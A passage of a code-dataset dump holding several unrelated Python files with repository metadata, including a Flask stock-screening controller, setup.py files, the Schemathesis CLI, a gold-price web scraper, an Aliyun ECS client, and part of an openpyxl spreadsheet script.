17, "usage_type": "argument"}, {"api_name": "dbhelper.runSQL", "line_number": 21, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 16, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": "call"}, {"api_name": "oauth2.get_current_user", "line_number": 27, "usage_type": "argument"}, {"api_name": "dbhelper.runSQL", "line_number": 32, 
"usage_type": "call"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "36373261674", "text": "import os\n\nfrom flask import Blueprint, render_template, request\n\nfrom common.common import RAW_V2_PATH\nfrom common.tdx import read_tdx_text\nfrom common.utils import filter_files_by_date\n\nblueprint = Blueprint('follow_bull', __name__)\n\n\ndef mode_shrink_adj(df):\n df = df[df['上次涨停'] <= 10]\n df = df[df['连缩量'] >= 1]\n df = df[df['涨幅%'] < 0]\n\n return df\n\n\ndef mode_follow_bull(df):\n df = df[df['上次涨停'] <= 10]\n df = df[df['连放量'] == 1]\n df = df[df['昨涨幅'] < 0]\n df = df[df['涨幅%'] > 0]\n\n return df\n\n\ndef mode_cont_limited_up(df):\n df = df[df['连板榜'] >= 2]\n df = df.sort_values(by='连板榜', ascending=False)\n return df\n\n\ndef mode_first_limited_up(df):\n df = df[df['首板'] == 1]\n\n return df\n\n\n@blueprint.route('/mode')\ndef mode():\n mode_list: list = [\n ('次阳', mode_follow_bull,),\n ('缩调', mode_shrink_adj,),\n ('连板', mode_cont_limited_up,),\n ('首板', mode_first_limited_up,),\n ]\n mode = request.args.get('mode', 0, type=int)\n directory_path = os.path.join(RAW_V2_PATH, '全部A股')\n file_pattern = r'(\\d{8})'\n file_pattern = f'全部A股({file_pattern}).txt'\n\n file_list = filter_files_by_date(directory_path, file_pattern)\n file_list = sorted(file_list, key=lambda x: x[1], reverse=True)\n file_list = file_list[0:30]\n\n result_dict = {}\n\n mode_call = mode_list[mode][1]\n for file_path, date in file_list:\n if not os.path.exists(file_path): continue\n df = read_tdx_text(file_path)\n df = mode_call(df)\n df = df.sort_values(by='MA5涨1', ascending=False)\n df['show'] = df['名称'].astype(str) + '|' + df['代码'].astype(str) + '|' + df['涨幅%'].astype(str) + '|' + df['MA5涨1'].astype(str)\n result_dict[f\"{date[:4]}-{date[4:6]}-{date[6:]}\"] = df['show'].to_list()\n\n template_var = {\n 'data': dict(result_dict.items()),\n 'mode_list': [item[0] for item in mode_list],\n 'request_args': {\n 'mode': mode,\n 'socket_token': request.args.get('socket_token', '', str),\n }\n }\n\n return render_template('mode.html', **template_var)\n", "repo_name": "entimm/stock", "sub_path": "controllers/mode_controller.py", "file_name": "mode_controller.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "common.common.RAW_V2_PATH", "line_number": 50, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "common.utils.filter_files_by_date", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.tdx.read_tdx_text", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, 
{"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "38194668748", "text": "import os\nfrom setuptools import setup\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"imx-nand-tools\",\n version = \"1.0.3\",\n python_requires='>3.5.2',\n url='https://github.com/DigitalSecurity/imx-nand-tools',\n author = \"Damien Cauquil\",\n author_email = \"damien.cauquil@digital.security\",\n description = (\"Freescale i.MX NAND reverse tools\"),\n long_description=read(\"README.rst\"),\n license = \"MIT\",\n keywords = \"imx freescale tool\",\n packages=['imxtools'],\n install_requires=[\n 'progressbar2',\n 'termcolor',\n 'bchlib'\n ],\n entry_points= {\n 'console_scripts': [\n 'imx-nand-info=imxtools.imx_nand_info:main',\n 'imx-nand-convert=imxtools.imx_nand_convert:main'\n ]\n },\n)\n", "repo_name": "DigitalSecurity/imx-nand-tools", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "21283332703", "text": "\"\"\"Utils module, common project methods.\"\"\"\nfrom django.conf import settings\n\n\ndef has_console_access(user):\n \"\"\"Check if user has access to extra content.\"\"\"\n if user.is_staff:\n return True\n\n if not getattr(settings, 'ALLOW_CONSOLE_ACCESS', False):\n return False\n\n return user.groups.filter(name='ecomm_console_client').exists()\n", "repo_name": "eduNEXT/ecommerce-extensions", "sub_path": "ecommerce_extensions/core/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.settings", "line_number": 10, "usage_type": "argument"}]} +{"seq_id": "29131515366", "text": "import traceback\nfrom enum import Enum\nfrom typing import Callable, Dict, Generator, Iterable, List, Optional, Tuple, Union, cast\n\nimport click\nimport hypothesis\nimport requests\n\nfrom .. import checks as checks_module\nfrom .. import models, runner\nfrom ..runner import events\nfrom ..types import Filter\nfrom ..utils import WSGIResponse\nfrom . 
import callbacks, output\nfrom .context import ExecutionContext\nfrom .options import CSVOption, NotSet, OptionalInt\n\nCONTEXT_SETTINGS = {\"help_option_names\": [\"-h\", \"--help\"]}\n\nDEFAULT_CHECKS_NAMES = tuple(check.__name__ for check in checks_module.DEFAULT_CHECKS)\nALL_CHECKS_NAMES = tuple(check.__name__ for check in checks_module.ALL_CHECKS)\nCHECKS_TYPE = click.Choice((*ALL_CHECKS_NAMES, \"all\"))\nDEFAULT_WORKERS = 1\nMAX_WORKERS = 64\n\n\ndef register_check(function: Callable[[Union[requests.Response, WSGIResponse], models.Case], None]) -> None:\n \"\"\"Register a new check for schemathesis CLI.\"\"\"\n checks_module.ALL_CHECKS += (function,)\n CHECKS_TYPE.choices += (function.__name__,) # type: ignore\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.option(\"--pre-run\", help=\"A module to execute before the running the tests.\", type=str)\n@click.version_option()\ndef schemathesis(pre_run: Optional[str] = None) -> None:\n \"\"\"Command line tool for testing your web application built with Open API / Swagger specifications.\"\"\"\n if pre_run:\n load_hook(pre_run)\n\n\n@schemathesis.command(short_help=\"Perform schemathesis test.\")\n@click.argument(\"schema\", type=str, callback=callbacks.validate_schema)\n@click.option(\n \"--checks\", \"-c\", multiple=True, help=\"List of checks to run.\", type=CHECKS_TYPE, default=DEFAULT_CHECKS_NAMES\n)\n@click.option(\n \"-x\", \"--exitfirst\", \"exit_first\", is_flag=True, default=False, help=\"Exit instantly on first error or failed test.\"\n)\n@click.option(\n \"--auth\", \"-a\", help=\"Server user and password. Example: USER:PASSWORD\", type=str, callback=callbacks.validate_auth\n)\n@click.option(\n \"--auth-type\",\n \"-A\",\n type=click.Choice([\"basic\", \"digest\"], case_sensitive=False),\n default=\"basic\",\n help=\"The authentication mechanism to be used. Defaults to 'basic'.\",\n)\n@click.option(\n \"--header\",\n \"-H\",\n \"headers\",\n help=r\"Custom header in a that will be used in all requests to the server. Example: Authorization: Bearer\\ 123\",\n multiple=True,\n type=str,\n callback=callbacks.validate_headers,\n)\n@click.option(\n \"--endpoint\",\n \"-E\",\n \"endpoints\",\n type=str,\n multiple=True,\n help=r\"Filter schemathesis test by endpoint pattern. 
Example: users/\\d+\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--method\",\n \"-M\",\n \"methods\",\n type=str,\n multiple=True,\n help=\"Filter schemathesis test by HTTP method.\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--tag\",\n \"-T\",\n \"tags\",\n type=str,\n multiple=True,\n help=\"Filter schemathesis test by schema tag pattern.\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--workers\",\n \"-w\",\n \"workers_num\",\n help=\"Number of workers to run tests.\",\n type=click.IntRange(1, MAX_WORKERS),\n default=DEFAULT_WORKERS,\n)\n@click.option(\n \"--base-url\",\n \"-b\",\n help=\"Base URL address of the API, required for SCHEMA if specified by file.\",\n type=str,\n callback=callbacks.validate_base_url,\n)\n@click.option(\"--app\", help=\"WSGI application to test.\", type=str, callback=callbacks.validate_app)\n@click.option(\n \"--request-timeout\",\n help=\"Timeout in milliseconds for network requests during the test run.\",\n type=click.IntRange(1),\n)\n@click.option(\"--validate-schema\", help=\"Enable or disable validation of input schema.\", type=bool, default=True)\n@click.option(\"--show-errors-tracebacks\", help=\"Show full tracebacks for internal errors.\", is_flag=True, default=False)\n@click.option(\n \"--hypothesis-deadline\",\n help=\"Duration in milliseconds that each individual example with a test is not allowed to exceed.\",\n # max value to avoid overflow. It is maximum amount of days in milliseconds\n type=OptionalInt(1, 999999999 * 24 * 3600 * 1000),\n)\n@click.option(\"--hypothesis-derandomize\", help=\"Use Hypothesis's deterministic mode.\", is_flag=True, default=None)\n@click.option(\n \"--hypothesis-max-examples\",\n help=\"Maximum number of generated examples per each method/endpoint combination.\",\n type=click.IntRange(1),\n)\n@click.option(\"--hypothesis-phases\", help=\"Control which phases should be run.\", type=CSVOption(hypothesis.Phase))\n@click.option(\n \"--hypothesis-report-multiple-bugs\", help=\"Raise only the exception with the smallest minimal example.\", type=bool\n)\n@click.option(\"--hypothesis-seed\", help=\"Set a seed to use for all Hypothesis tests.\", type=int)\n@click.option(\n \"--hypothesis-suppress-health-check\",\n help=\"Comma-separated list of health checks to disable.\",\n type=CSVOption(hypothesis.HealthCheck),\n)\n@click.option(\n \"--hypothesis-verbosity\",\n help=\"Verbosity level of Hypothesis messages.\",\n type=click.Choice([item.name for item in hypothesis.Verbosity]),\n callback=callbacks.convert_verbosity,\n)\ndef run( # pylint: disable=too-many-arguments\n schema: str,\n auth: Optional[Tuple[str, str]],\n auth_type: str,\n headers: Dict[str, str],\n checks: Iterable[str] = DEFAULT_CHECKS_NAMES,\n exit_first: bool = False,\n endpoints: Optional[Filter] = None,\n methods: Optional[Filter] = None,\n tags: Optional[Filter] = None,\n workers_num: int = DEFAULT_WORKERS,\n base_url: Optional[str] = None,\n app: Optional[str] = None,\n request_timeout: Optional[int] = None,\n validate_schema: bool = True,\n show_errors_tracebacks: bool = False,\n hypothesis_deadline: Optional[Union[int, NotSet]] = None,\n hypothesis_derandomize: Optional[bool] = None,\n hypothesis_max_examples: Optional[int] = None,\n hypothesis_phases: Optional[List[hypothesis.Phase]] = None,\n hypothesis_report_multiple_bugs: Optional[bool] = None,\n hypothesis_suppress_health_check: Optional[List[hypothesis.HealthCheck]] = None,\n hypothesis_seed: Optional[int] = None,\n hypothesis_verbosity: 
Optional[hypothesis.Verbosity] = None,\n) -> None:\n \"\"\"Perform schemathesis test against an API specified by SCHEMA.\n\n SCHEMA must be a valid URL or file path pointing to an Open API / Swagger specification.\n \"\"\"\n # pylint: disable=too-many-locals\n\n if \"all\" in checks:\n selected_checks = checks_module.ALL_CHECKS\n else:\n selected_checks = tuple(check for check in checks_module.ALL_CHECKS if check.__name__ in checks)\n\n prepared_runner = runner.prepare(\n schema,\n auth=auth,\n auth_type=auth_type,\n headers=headers,\n request_timeout=request_timeout,\n base_url=base_url,\n endpoint=endpoints,\n method=methods,\n tag=tags,\n app=app,\n seed=hypothesis_seed,\n exit_first=exit_first,\n checks=selected_checks,\n workers_num=workers_num,\n validate_schema=validate_schema,\n hypothesis_deadline=hypothesis_deadline,\n hypothesis_derandomize=hypothesis_derandomize,\n hypothesis_max_examples=hypothesis_max_examples,\n hypothesis_phases=hypothesis_phases,\n hypothesis_report_multiple_bugs=hypothesis_report_multiple_bugs,\n hypothesis_suppress_health_check=hypothesis_suppress_health_check,\n hypothesis_verbosity=hypothesis_verbosity,\n )\n execute(prepared_runner, workers_num, show_errors_tracebacks)\n\n\ndef get_output_handler(workers_num: int) -> Callable[[ExecutionContext, events.ExecutionEvent], None]:\n if workers_num > 1:\n output_style = OutputStyle.short\n else:\n output_style = OutputStyle.default\n return cast(Callable[[ExecutionContext, events.ExecutionEvent], None], output_style)\n\n\ndef load_hook(module_name: str) -> None:\n \"\"\"Load the given hook by importing it.\"\"\"\n try:\n __import__(module_name)\n except Exception:\n click.secho(\"An exception happened during the hook loading:\\n\", fg=\"red\")\n message = traceback.format_exc()\n click.secho(message, fg=\"red\")\n raise click.Abort()\n\n\nclass OutputStyle(Enum):\n \"\"\"Provide different output styles.\"\"\"\n\n default = output.default.handle_event\n short = output.short.handle_event\n\n\ndef execute(\n prepared_runner: Generator[events.ExecutionEvent, None, None], workers_num: int, show_errors_tracebacks: bool\n) -> None:\n \"\"\"Execute a prepared runner by drawing events from it and passing to a proper handler.\"\"\"\n handler = get_output_handler(workers_num)\n context = ExecutionContext(workers_num=workers_num, show_errors_tracebacks=show_errors_tracebacks)\n for event in prepared_runner:\n handler(context, event)\n", "repo_name": "borisrny/efforte1", "sub_path": "venv/lib/python3.7/site-packages/schemathesis/cli/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 8780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "click.Choice", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.Response", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.WSGIResponse", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "click.group", "line_number": 33, "usage_type": "call"}, {"api_name": "click.option", "line_number": 34, "usage_type": "call"}, {"api_name": "click.version_option", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 149, 
"usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 154, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 155, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 156, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 163, "usage_type": "name"}, {"api_name": "options.NotSet", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 164, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 166, "usage_type": "name"}, {"api_name": "hypothesis.Phase", "line_number": 166, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 168, "usage_type": "name"}, {"api_name": "hypothesis.HealthCheck", "line_number": 168, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 170, "usage_type": "name"}, {"api_name": "hypothesis.Verbosity", "line_number": 170, "usage_type": "attribute"}, {"api_name": "runner.prepare", "line_number": 183, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 43, "usage_type": "call"}, {"api_name": "click.option", "line_number": 44, "usage_type": "call"}, {"api_name": "click.option", "line_number": 47, "usage_type": "call"}, {"api_name": "click.option", "line_number": 50, "usage_type": "call"}, {"api_name": "click.option", "line_number": 53, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 56, "usage_type": "call"}, {"api_name": "click.option", "line_number": 60, "usage_type": "call"}, {"api_name": "click.option", "line_number": 69, "usage_type": "call"}, {"api_name": "click.option", "line_number": 78, "usage_type": "call"}, {"api_name": "click.option", "line_number": 87, "usage_type": "call"}, {"api_name": "click.option", "line_number": 96, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 104, "usage_type": "call"}, {"api_name": "click.option", "line_number": 111, "usage_type": "call"}, {"api_name": "click.option", "line_number": 112, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 115, "usage_type": "call"}, {"api_name": "click.option", "line_number": 117, "usage_type": "call"}, {"api_name": "click.option", "line_number": 118, "usage_type": "call"}, {"api_name": "click.option", "line_number": 119, "usage_type": "call"}, {"api_name": "options.OptionalInt", "line_number": 123, "usage_type": "call"}, {"api_name": "click.option", "line_number": 125, "usage_type": 
"call"}, {"api_name": "click.option", "line_number": 126, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 129, "usage_type": "call"}, {"api_name": "click.option", "line_number": 131, "usage_type": "call"}, {"api_name": "options.CSVOption", "line_number": 131, "usage_type": "call"}, {"api_name": "hypothesis.Phase", "line_number": 131, "usage_type": "attribute"}, {"api_name": "click.option", "line_number": 132, "usage_type": "call"}, {"api_name": "click.option", "line_number": 135, "usage_type": "call"}, {"api_name": "click.option", "line_number": 136, "usage_type": "call"}, {"api_name": "options.CSVOption", "line_number": 139, "usage_type": "call"}, {"api_name": "hypothesis.HealthCheck", "line_number": 139, "usage_type": "attribute"}, {"api_name": "click.option", "line_number": 141, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 144, "usage_type": "call"}, {"api_name": "hypothesis.Verbosity", "line_number": 144, "usage_type": "attribute"}, {"api_name": "typing.cast", "line_number": 215, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 215, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 215, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 215, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 210, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 210, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 210, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 210, "usage_type": "name"}, {"api_name": "click.secho", "line_number": 223, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 224, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 225, "usage_type": "call"}, {"api_name": "click.Abort", "line_number": 226, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 229, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 237, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 237, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 237, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 241, "usage_type": "call"}]} +{"seq_id": "23989190191", "text": "# -*- coding: utf-8 -*-\n\nfrom distutils.core import setup\nfrom setuptools import find_packages\n\nversion = __import__('my_project').__version__\n\n\nsetup(\n name='my-project',\n version=version,\n author=u'Rubén Pardo',\n author_email='yosoyruben@gmail.com',\n packages=find_packages(),\n url='https://github.com/wen96/django-boilerplate',\n license='MIT',\n description='Example packaging',\n long_description='Example packaging',\n include_package_data=True\n)\n", "repo_name": "wen96/django-boilerplate", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "distutils.core.setup", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "14404443176", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport json\nimport os\n\ndef get_data():\n \"\"\"\n gets the price of gold for each year from 1969 to 2023\n \"\"\"\n url 
= 'https://www.macrotrends.net/1333/historical-gold-prices-100-year-chart'\n response = requests.get(url, headers= {'User-Agent': 'Mozilla/5.0'})\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # parsing html to get the right table\n table = soup.find('table', {'class': 'table'})\n\n table_data = []\n\n for row in table.find_all('tr'):\n row_data = []\n for cell in row.find_all(['th', 'td']):\n row_data.append(cell.text.strip())\n table_data.append(row_data)\n\n\n # 0th element is table name 1st element are column names 2nd and forward elements are data\n df = pd.DataFrame(table_data[2:], columns=table_data[1])\n df.to_csv('table_data.csv', index=False)\n\n\n folder_path = 'UVP-project\\data'\n file_name = 'gold_prices.json'\n\n directory_path = os.path.join(os.getcwd(), folder_path)\n\n if not os.path.exists(directory_path):\n os.makedirs(directory_path)\n\n file_path = os.path.join(directory_path, file_name)\n\n\n # making content of the file\n gold_prices_JSON = {}\n for index, row in enumerate(table_data):\n if index > 2:\n gold_prices_JSON[row[0]] = {}\n gold_prices_JSON[row[0]]['Average closing price'] = row[1]\n gold_prices_JSON[row[0]]['Annual percentage change'] = row[6]\n\n jsonString = json.dumps(gold_prices_JSON)\n\n\n with open(file_path, \"w\") as jsonFile:\n jsonFile.write(jsonString)\n\n\nget_data()\n#all prices are for ounce of gold\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "NikZivkovicKokalj/UVP-project", "sub_path": "get_data/gold_prices.py", "file_name": "gold_prices.py", "file_ext": "py", "file_size_in_byte": 1674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "28729166558", "text": "# -*- coding: UTF-8 -*-\n\"\"\"\n aliyun.ecs\n ~~~~~~~~~~~\n\"\"\"\nfrom utils import scan_page\nfrom base import *\nfrom aliyunsdkecs.request.v20140526 import DescribeInstancesRequest as ECSRequest\nfrom aliyunsdkecs.request.v20140526 import DescribeDisksRequest as DisksRequest\n\n\nclass ECS(AliyunBase):\n @classmethod\n @scan_page\n def get_instances(cls, page_num=1, page_size=50):\n request = ECSRequest.DescribeInstancesRequest\n responses = cls.do_request(request, page_num, page_size)\n ret = []\n for clt, resp in responses:\n access_key = clt.get_access_key()\n if resp.get('Instances', {}).get('Instance', {}):\n instances = []\n for i in resp['Instances']['Instance']:\n i['Access_key'] = access_key\n instances.append(i)\n ret.extend(instances)\n return ret\n\n\n @classmethod\n @scan_page\n def get_disks(cls, page_num=1, page_size=50):\n request = DisksRequest.DescribeDisksRequest\n responses = cls.do_request(request, page_num, page_size)\n ret = []\n 
for clt, resp in responses:\n access_key = clt.get_access_key()\n if resp.get('Disks', {}).get('Disk', {}):\n disks = []\n for i in resp['Disks']['Disk']:\n i['Access_key'] = access_key\n disks.append(i)\n ret.extend(disks)\n return ret\n\n\nif __name__ == '__main__':\n r = ECS.get_disks()\n print(len(r))\n # import json\n # print(json.dumps(r, indent=4))\n", "repo_name": "ri0day/POW", "sub_path": "zcmdb/graphCMDB/aliyun/ecs.py", "file_name": "ecs.py", "file_ext": "py", "file_size_in_byte": 1589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aliyunsdkecs.request.v20140526.DescribeInstancesRequest.DescribeInstancesRequest", "line_number": 16, "usage_type": "attribute"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeInstancesRequest", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.scan_page", "line_number": 14, "usage_type": "name"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeDisksRequest.DescribeDisksRequest", "line_number": 33, "usage_type": "attribute"}, {"api_name": "aliyunsdkecs.request.v20140526.DescribeDisksRequest", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.scan_page", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "12802599356", "text": "#-*- coding:utf-8 -*-\n#本程式可實現將GPK_MC CSCC中的料號填入Connector list\n#且對於同功能名稱但有不同接頭的情況進行比對區分\n#模糊比對採用find()函式手法, 缺點:無法比對同功能名稱,但字串順序不同的狀況\n#模糊比對增加set()函式手法, 可比對同功能名稱但字串順序不同的狀況\n#增加端子比對功能\n#4.2.1T版本追加: 如果端子廠商比對結果不同,就把儲存格反紅\n#追加資料夾路徑指示\n#適用python2.7 & python3.4\n\nimport openpyxl\nimport re\nfrom datetime import datetime\nfrom openpyxl.styles import PatternFill\n\nColor_red=PatternFill(fgColor='DC143C', fill_type=\"darkUp\") #作用為如果廠商不同廠,可把儲存格顏色反紅\nnum=0\ndef loadExcel(filename): #返回某個EXCEL檔案的所有sheet的串列\n wb=openpyxl.load_workbook(filename)\n sheetname=wb.get_sheet_names()\n return wb,sheetname\n\ndef theSameName(dit,key, getsheet,i, next_line,col_num,col_maker ):\n j=0\n while getsheet.cell(row=i+next_line+j, column=col_num).value is not None:\n if getsheet.cell(row=i+next_line+j, column=col_num).value.startswith('H:'):\n #比對正確就把接頭料號與廠商名稱加入該鍵的串列\n dit[key].append(getsheet.cell(row=i+next_line+j, column=col_num).value.lstrip('H:').strip())\n dit[key].append(getsheet.cell(row=i+next_line+j, column=col_maker).value)\n\n T13_theSame = getsheet.cell(row=i+next_line+j+1, column=col_num).value\n HT25_theSame = getsheet.cell(row=i+next_line+j+1, column=col_maker).value #原廠端子廠商\n if T13_theSame is None:\n pass\n else:\n k=1\n while T13_theSame is not None:\n if T13_theSame.startswith(\"T:\"):\n break\n else:\n T13_theSame = getsheet.cell(row=i+next_line+j+1+k, column=col_num).value #原廠端子料號\n HT25_theSame = getsheet.cell(row=i+next_line+j+1+k, column=col_maker).value #原廠端子廠商\n k += 1\n\n dit[key].append(T13_theSame)\n dit[key].append(HT25_theSame)\n else:\n pass\n j +=1\n return dit\n\n# cscc()的格式為cscc(字典檔,i, Excel_sheet,功能名稱的欄號, 接頭料號的欄號,製造商的欄號)\ndef cscc(dit,i, getsheet,col_function,col_num,col_maker ):\n \n if getsheet.cell(row=i, column=col_function).value is None: #column=12欄位是功能名稱\n pass\n else:\n if getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ') not in dit: #如果功能名稱未出現在CSSS_CONN_NAME中,此功能名稱鍵還未被創立\n #將字串轉換成大寫,移除前後換行空白字元,底線換成空格,中線換成空格\n L12=getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ') \n H13 = getsheet.cell(row=i+1, column=col_num).value # 原廠膠盒料號\n # 如果H13是空字符,那就將H13由原本指定的列數再往下一列,其餘元素跟著往下偏移\n if H13 is None: \n H13 = 
